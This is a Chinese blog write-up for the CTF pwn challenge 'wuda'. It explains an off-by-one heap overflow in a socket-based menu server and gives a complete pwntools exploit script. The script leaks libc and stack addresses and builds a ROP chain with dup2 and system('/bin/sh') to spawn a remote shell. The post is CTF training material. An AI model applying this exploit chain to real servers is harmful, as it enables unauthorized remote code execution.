攻防世界PWN之wuda题解

最新推荐文章于 2024-07-22 14:49:16 发布
最新推荐文章于 2024-07-22 14:49:16 发布
阅读量579 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 pwn ctf 二进制漏洞 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104288411
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Wuda

首先,我们检查一下程序的保护机制

然后,我们用IDA分析一下

是一个类似于服务器的程序,监听了本地端口1337

看起来很复杂,当我们的关注点不在这

我们的关注点在这,当数据包满足一定的条件后,就能调出菜单。

菜单里是经典的增删改查操作

堆的大小没有限制,最多可以保存10个堆指针。

经过分析,我们发现节点的结构体是这样的

  1. typedef struct Node {    
  2.     int64_t size;    
  3.     char *content;    
  4. };    

malloc的顺序是这样的

  1. Node *node = (Node *)malloc(sizeof(Node))  
  2. node->size = size;  
  3. node->content = (char *)malloc(sizeof(char)*size)  

edit功能存在一个off by one漏洞,能够溢出一个字节数据

show功能不存在漏洞

delete功能不存在UAF漏洞

解题思路

构造这样的堆布局

chunk3需要借位到chunk4通过chunk3的off by one,控制chunk4堆块的size的prev_inuse位为0,代表前一个相邻块为free的状态,在content2的末尾8字节,伪造prev_size为0、1、2、3的总大小

我们知道node结构体里有一个content指针,我们能够控制这个指针,就能实现任意地址读写,我们只需malloc一个大于等于0xA0的堆,就能够控制整个node1了,就能轻而易举的修改node1的content指针

实现了任意地址的读写,本题我们写了free_hook或者malloc_hook以后还没有完事,本题是一个服务器端程序,我们简单的getshell,只会在服务器上弹出shell并且socat只对端口做了转发,不像其他类型的pwn是由socat重定向0和1。因此,我们还需要手动把01重定向到socketfd中去,这样,我们才能在我们这边得到shell

我们既然已经实现了任意地址读写,那么我们不如写ROP到某函数的返回处的栈地址处。利用ROP,我们可以调用dup2函数来重定向0和1文件描述符到socket的文件描述符,也可以mprotect一块RWX的内存,跳过去执行,这里我选择的是直接ROP执行dup2函数。

综上,我们的exp脚本

#coding:utf8
from pwn import *

sh = remote('127.0.0.1',1337)
#sh = remote('127.0.0.1',2333)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pop_rdi = 0x4092c3
#pop rsi ; pop r15 ; ret
pop_rsi = 0x4092c1
malloc_hook_s = libc.symbols['__malloc_hook']
system_s = libc.sym['system']
dup2_s = libc.sym['dup2']
binsh_s = libc.search('/bin/sh').next()
#借助environ,我们可以得到栈地址
environ = libc.symbols['environ']

def init_connect():
   #magic
   sh.send('RPCM')
   sh.send(p32(0x10))
   sh.send(p32(0))
   #发送-1,网络序是大端,因此我们逆序
   sh.send(p32(0x100000000-1)[::-1])

def create(size,content):
   sh.sendlineafter('Your choice :','1')
   sh.sendlineafter('Size:',str(size))
   sh.sendafter('Content:',content)

def edit(index,content):
   sh.sendlineafter('Your choice :','2')
   sh.sendlineafter('Index:',str(index))
   sh.sendafter('Content: ',content)

def show(index):
   sh.sendlineafter('Your choice :','3')
   sh.sendlineafter('Index :',str(index))


def delete(index):
   sh.sendlineafter('Your choice :','4')
   sh.sendlineafter('Index :',str(index))

init_connect()
#=====这个骚操作,是为了让以后申请的块能够连续===
create(0x1000,'\x00'*0x1000)
create(0x1000,'\x00'*0x1000)
delete(0)
delete(1)
#===============================================

#unsorted bin范围的chunk,用于泄露libc指针
create(0x80,'a'*0x80) #0
create(0x10,'b'*0x10) #1
create(0x80,'c'*0x80) #2
create(0x20,'d'*0x20) #3
create(0x20,'e'*0x20) #4

delete(0)
create(0x80,'\n')
#泄露libc指针
show(0)
sh.recvuntil('Content : ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
environ_addr = libc_base + environ
dup2_addr = libc_base + dup2_s
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
print 'binsh_addr=',hex(binsh_addr)
print 'dup2_addr=',hex(dup2_addr)
#=============这里的操作,是为了让chunk0、2、3的数据域相邻,而chunk1结构体和数据则处于0和2之间,这样,我们利用off by one,控制chunk3的size=====
delete(2)
delete(3)
create(0x18,'c'*0x18) #2
delete(4)
create(0x80,'d'*0x80) #3
#============================
#现在chunk2 off by one,覆盖chunk1的size的低一字节
#使得prev_size = 0xE0,prev_inuse位为0,这样我们就可以向前合并
edit(2,'c'*0x10 + p64(0xF0) + p8(0x90))
delete(0)
#向前合并
delete(3)

create(0xA0,'a'*0x80) #0
#现在节点1的结构体重合到了节点0的数据域末尾,我们可以修改了,我们将节点1的结构体内的数据域指针指向我们需要的地址,实现任意地址读写
#现在,我们要泄露栈地址,我们就把指针指向environ
payload = 'a'*0x80 + p64(0x90) + p64(0x21) + p64(0x10) + p64(environ_addr)
edit(0,payload)
#泄露栈地址
show(1)
sh.recvuntil('Content : ')
stack_addr = u64(sh.recv(6).ljust(8,'\x00'))
#计算出fd存放的位置
fd_addr = stack_addr - 0x77C
print 'fd_addr=',hex(fd_addr)
#泄露fd
payload = 'a'*0x80 + p64(0x90) + p64(0x21) + p64(0x4) + p64(fd_addr)
edit(0,payload)
show(1)
sh.recvuntil('Content : ')
fd = u32(sh.recvuntil('\n',drop = True).ljust(4,'\x00'))
print 'fd=',hex(fd)
#计算ROP写入的位置,即写到edit函数的返回地址存放处即可
rop_addr = stack_addr - 0x740
#dup(fd,0)
rop = p64(pop_rdi) + p64(fd) + p64(pop_rsi) + p64(0) * 2 + p64(dup2_addr)
#dup(fd,1)
rop += p64(pop_rdi) + p64(fd) + p64(pop_rsi) + p64(1) * 2 + p64(dup2_addr)
#system('/bin/sh')
rop += p64(pop_rdi) + p64(binsh_addr) + p64(system_addr)

#指向rop_addr,然后写ROP
payload = 'a'*0x80 + p64(0x90) + p64(0x21) + p64(len(rop)) + p64(rop_addr)
edit(0,payload)
edit(1,rop)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwn题解第一道
bluestar628的博客
03-24 1826
今天听说了一个网站pwnable.kr。很适合初学者,就试着做了一道题目。 第一道题目,按照网页上给的链接,使用putty链接工具联入。 输入ls命令查看文件内容。 很开心的看到了flag文件,于是直接打开,果然不出所料,我是没有权限打开的。然后查看了一下fd.c的代码。 #include #include #include char buf[32]; int main(in
BSides Delhi CTF 2018部分pwn题解
Peanuts
11-03 914
本文后部分首发于先知社区 这个是一个比较基础的国际赛,做完之后的感觉就是其中有些题目很有价值,可以顺便补充一些信号机制、uaf使用的知识。 canary 这个题目比较简单,就是一个普通的stack smash并没有什么特别的,这里直接上解题思路了 解题思路 因为开启了canary,而且flag文件是加载到了bss段之中,所以可以利用_stackchk_failed函数进行一个flag...
攻防世界PWN之shell题解
seaaseesa的博客
11-22 1412
shell 首先,检查一下程序的保护机制 然后,我们用IDA分析 存在栈溢出漏洞 我们先运行程序,发现可以直接输命令 然而,其他命令都不可用,需要登录成功才能用 我们看看登录的逻辑 程序从creds.txt文件中一行一行的读取,取第一个冒号后面的内容为用户名,取第二个冒号后面的内容为密码 只要我们输入的用户名和密码存在于那个文件,就登录成功,然后就能执行shel...
攻防世界PWN之Recho题解
seaaseesa的博客
11-09 2337
Recho 首先,还是查看一下程序的保护机制。看起来不错。 然后用IDA分析 看起来是一个很简单的溢出,然而,这题的难点在于这个循环如何结束。read一直都是真,如果是在linux终端上直接运行,我们可以用Ctrl+D,然而,pwn远程,就无法处理这种信号。幸运的是pwntools提供了一个shutdown功能,该功能可以关闭流,如果我们关闭输入流,这个循环就结束了。但是我们别想再次...
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2515
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
攻防世界PWN题解
liucc09的博客
12-03 850
level3 程序分析 通过ida打开程序,F5键生成C的代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { vulnerable_function(); write(1, "Hello, World!\n", 0xEu); return 0; } ssize_t vulnerable_function() { char buf; // [esp+0h] [ebp-88h] write(1,
攻防世界新手题
qq_46151129的博客
10-10 229
Web–command_execution 题目描述:小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。 打开场景后: 因为是一个执行ping的输入框,访问本地(127.0.0.1) 访问成功后,尝试获取当前目录,使用命令“Is” 访问成功后,寻找txt文件,输入命令“127.0.0.1 &&find / -name “*.txt”。 可以看到里面都flag文件,使用cat抓取文件 就得到了我们的flag。 Web–simple_php 题目描述:小宁听说
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
攻防世界PWN之redbud题解
seaaseesa的博客
02-17 540
Redbud 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 在程序的主功能函数里,存在一个明显的栈溢出,由于没有开启PIE,我们很容易做ROP。并且这是一个服务器程序,通过fork子进程来处理我们的请求,因此canary的值我们可以逐字节爆破。因为只要父进程没有重新启动,canary的值就不会变化,这题和cnss那题是一个道理。 那么,我们直接上exp脚本 #cod...
PWN综合练习二
WateranFire的博客
10-27 443
合天上的课程笔记 dup2(socket,0)——将socket与标准输入绑定 dup2(socket,1)——将socket与标准输出绑定 realpath(name,&resolved)——将name中的路径转为绝对路径存入resolved 就算realpath调用失败,resolved内还是会填充数据,并且前缀会加上当前路径,构造shellcode时需要注意 有时应该打印出了内容但接
攻防世界PWN之echo_back题解
seaaseesa的博客
11-17 2444
echo_back 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下, 在功能2有一个明显的格式化输出字符串漏洞 但是,我们能够输入的字符串长度最多为7个字符 好啦,不管怎么说,首先得用这个漏洞泄露一些地址 当我们要执行printf时,我们发现,距离当前栈顶13个位置处,有__libc_start_main+F0的地址,但是,这不是说要输出它的值...
攻防世界 A GOOD idea WP
qq_43455259的博客
04-06 1924
攻防世界 A GOOD idea WP 1.下载压缩包解压后,改图片后缀名为zip打开发现有两张图片一个txt 2.Stegsolve合成两张图片,发现有红色的亮点,仔细看好像二维码 3.Ps调整图片参数,最终发现需要调大曝光度,得到二维码 4.扫描二维码得到flag NCTF{m1sc_1s_very_funny!!!} ...
CSAW2016之PWN题目tutorial的解法
HappyOrange2014的专栏
09-27 1981
每次做pwn题目都像破案一样,千头万绪,环环相扣,在凑齐所有线索之后一击致命,非常有意思。但毕竟初学,还需凭着这点兴趣继续努力!该题目是在64bit的linux运行的。用户可以选择3个选项,第一个选项会打印出puts函数的地址,第二个选项存在栈溢出,可以输入shellcode,第三个选项会退出程序。
攻防世界PWN之sentosa题解
seaaseesa的博客
02-12 769
Sentosa 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,一个经典的增删改查程序 经过分析,程序中不存在堆溢出漏洞,唯一的漏洞在这里 如果a2是0,就会造成输入长度无限制,因为0-1变成-1,传给read,而read的size参数为无符号数,导致-1转换成无符号数,很大,可以无限制输入。 最终造成create函数里栈溢出,覆盖v6指针 如果a2是0,就会造成...
Lianwei 安全周报|2024.07.22
最新发布
联蔚盘云的博客
07-22 752
新的一周又开始了,以下是本周「Lianwei周报」,我们总结推荐了本周的政策/标准/指南最新动态、热点资讯和安全事件,保证大家不错过本周的每一个重点!
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值